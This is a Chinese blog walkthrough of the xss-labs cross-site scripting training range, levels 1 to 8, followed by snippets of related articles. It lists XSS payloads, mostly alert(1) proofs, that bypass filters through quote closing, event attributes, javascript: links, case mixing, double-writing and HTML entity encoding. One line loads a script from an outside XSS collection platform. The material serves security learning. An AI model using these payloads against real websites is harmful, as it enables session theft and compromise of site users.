xss-labs

最新推荐文章于 2024-08-04 21:22:37 发布
最新推荐文章于 2024-08-04 21:22:37 发布
阅读量113 收藏
点赞数
文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangqaz50/article/details/118882743
版权

目录

基本信息

<script>alert(1);</script>	//直接嵌入script

<script src=https://xsspt.com/MQzN0Z></script>		//从远程嵌入script

<input name=keyword value="" onmouseover="alert(1)">	//通过事件属性值传入script字符串

<a HREF=javascript:alert(1)>aaa</a>		//超链接


<a HREF=javasc&#114;ipt:alert(1)>aaa</a>	//html实体转义

1,无过滤

把test改为alert(1)把test改为

直接过关。

在这里插入图片描述

2,双引号包裹:闭合双引号>

在这里插入图片描述
用第一关的方法,不行了。右击鼠标看源码

在这里插入图片描述在这里插入图片描述
发现1这个位置的<>被转码了

但是2这个位置没有,所以可以考虑把2当做输出点

先用">闭合value标签,再输出弹窗。

在这里插入图片描述

3,实体转换>,单引号包裹:使用事件,闭合单引号

输入’ ‘’ < >,查看源码,发现两个地方,"<>都被转码了
在这里插入图片描述在这里插入图片描述

4,双引号包裹:闭合双引号

简单尝试"οnclick="alert(1)发现直接弹窗,应该与第三关相似,查看后台源代码
发现是有点区别,但是过滤闭合方法差不多

5,on和ri用_分开,双引号包裹:利用a便签href属性,闭合">

还是尝试"οnclick=“alert(1)发现on被分开了
在这里插入图片描述再尝试发现ri被分开了
在这里插入图片描述但是<>是可以用的,所以这里利用a标签的href属性”>,仍然需要闭合<",点击">跳转

6,re,ri,on用_分开;大小写绕过

用前面几关的方法来试,都不行
百度了是大小写绕过
">

7,对整个字母过滤;双写绕过

随便输入试一下,看到script直接就没了,立马就想到了双写绕过
在这里插入图片描述成功
">alert(1)

8,大小写和双写都过滤;unicode编码

百度的
添加友情链接后,点击友情链接,就会跳到刚刚添加的友情链接的位置
在这里插入图片描述在这里插入图片描述拿试水,script被过滤了。

在这里插入图片描述试试其他的方法。on事件也被过滤了,大小写也不行。看了看攻略,要用到转义字符

查ASCII表得:s是115
所以用java&#115cript:alert(1)试试
成功

未完待续

王薪盛
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xss-labs靶场
newlife1441的博客
07-29 815
靶场搭建,可以从Github上下载或者直接下载下面的资源入门级别的xss-labs靶场,有需要的自行下载搭建,搭建过程可以参考网上的资料-网络安全文档类资源-CSDN下载入门级别的xss-labs靶场,适合新入门的学生进行练习,希望你可以从学习到一些解题的相关技巧和关更多下载资源、学习资料请访问CSDN下载频道.https。......
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
Buuctf web ware up
wangqaz50的博客
07-25 431
打开页面只有一个图片 于是查看网页源代码,发现是source.php 访问/source.php,得到网页源码(即将source.php添加到后边,删除前边的view-source:http://) <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["sour
<a href=““>双引号里的东西是不能有空格的,有空格的话点击按钮页面空白
qq_45325275的博客
01-05 537
在这里插入代码片 <%-- Created by IntelliJ IDEA. User: dell Date: 2022/1/3 Time: 20:32 To change this template use File | Settings | File Templates. --%> <%@ page contentType="text/html;charset=UTF-8" language="java" %> <%@ taglib pref...
XSS-labs详解
ytdd66的博客
03-23 2061
进入靶场点击图片,开始我们的XSS之旅!
Web渗透-XSS漏洞深入及xss-labs靶场实战
Varin
06-24 1314
xss全称(cross site scripting)跨站脚本攻击,是最常见的web应用程序安全漏洞之一,位于owasptop102013年度第三名xss是指攻击者在网页嵌入客户端脚本,通常是javascrip编写的危险代码,当用户使用浏览网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的
XSS-labs
YouthBelief的博客
10-18 208
XSSlabs前言level1payload: ``level3payload 'οnmοuseοver='javascript:alert(1)level4payload "οnmοuseοver="javascript:alert(1)level5payload `"> xss `level6大小写混写payload `"> xss level7payload总结 前言 开始做笔记 记录学习 level1 发现url处存在传参 ?name=test 且页面有回显 test
xss-labs-master靶场
K_kiii的博客
03-09 396
level1 发现有一个name参数,值为test;对name进行payload注入 name=<script>alert('hack')</script> 说明源码是完全没有对get请求道德name变量进行过滤,所以会被执行。 level2 1.test是以get请求发送的变量,2.在页面上发现了用户发送的变量 查看源码 发现我们输入的内容是一个文本框的value值,这样浏览器是不会执行我们的注入语句的,所以我们要构造标签闭合 构造闭合标签,把inp
XSS-labs靶场通关
Fly_Mojito的博客
06-06 700
XSS-labs靶场通关
XSS靶场闯关(xss-labs)
小郑的博客
04-22 1954
对数据进行了是否含有http://做了判断,并对关键字做了替换,把数据加到了a标签的href属性,在属性的数据可以考虑编码,并利用js的注释符//注释掉http://当前页面上有两个输出地方,一个输出到了h2标签,后台进行了实体编码,另一个输出到input标签的value属性,没有进行html实体编码,考虑闭合input标签。对on,script进行了替换,将数据加到了input标签的value属性,没有进行实体编码处理,可以考虑a标签的href属性,可以直接写伪协议。
xss-labs-master源码
07-06
"xss-labs-master"是一个专门设计的靶场,包含了20个级别的XSS练习,旨在帮助学习者深入理解和掌握XSS攻击的原理、类型以及防御策略。通过逐步解决这些精心设计的挑战,我们可以逐步提升对XSS攻击的理解,并提升安全...
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
安装xss-labs ppt手册
10-22
**XSS漏洞详解与XSS-Labs安装指南** XSS(Cross Site Scripting),即跨站脚本攻击,是网络安全领域常见的一种攻击方式。它允许攻击者通过注入恶意脚本到网页,使得用户在不知情的情况下执行这些脚本,从而获取...
xss-labs.zip
03-18
这个“xss-labs.zip”文件显然是一个专门为学习和理解XSS漏洞而设计的实践平台,包含了20个具有不同XSS特征的网页示例。通过这个实验室,你可以深入学习如何检测、防范以及利用XSS漏洞。 XSS攻击通常分为三种类型:...
CTFHub——XSS——反射型
qq_48368964的博客
08-01 347
平台测试语句注入,将得到的url编码地址填入url框(此过程模拟用户被诱导点击链接)发现为表单式,猜测哪个可能存在注入漏洞,分别做测试注入发现name框存在。但不是对方cookie,参考wp发现要用xss线上平台。
xss漏洞(四,xss常见类型)
最新发布
2302_80280669的博客
08-04 219
可缩放矢量图形)基于xml标记语言,用于描述二维的矢量图形,放大缩小不影响清晰度,可嵌入JavaScript代码。</svg>将要执行的恶意JavaScript代码嵌入到pdf
btslab靶场-通过xss获取他人cookie并利用
qq_39972370的博客
08-02 347
匿名攻击者在不知道他人账号密码的情况下,盗取cookie并利用他人身份在论坛活动。
蓝桥杯单片机竞赛-超声波测量显示
08-04
博客地址:https://blog.csdn.net/weikangcekong/article/details/140906931?spm=1001.2014.3001.5501
xss-labs安装
07-28
XSS-labs是一个用于学习和测试跨站脚本攻击(XSS)的平台。根据引用\[1\],在学习了XSS的基础知识并完成了一些简单的XSS测试后,可以开始攻略XSS-labs。不过需要注意的是,对于XSS-labs,我们只需大致了解一些思路...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值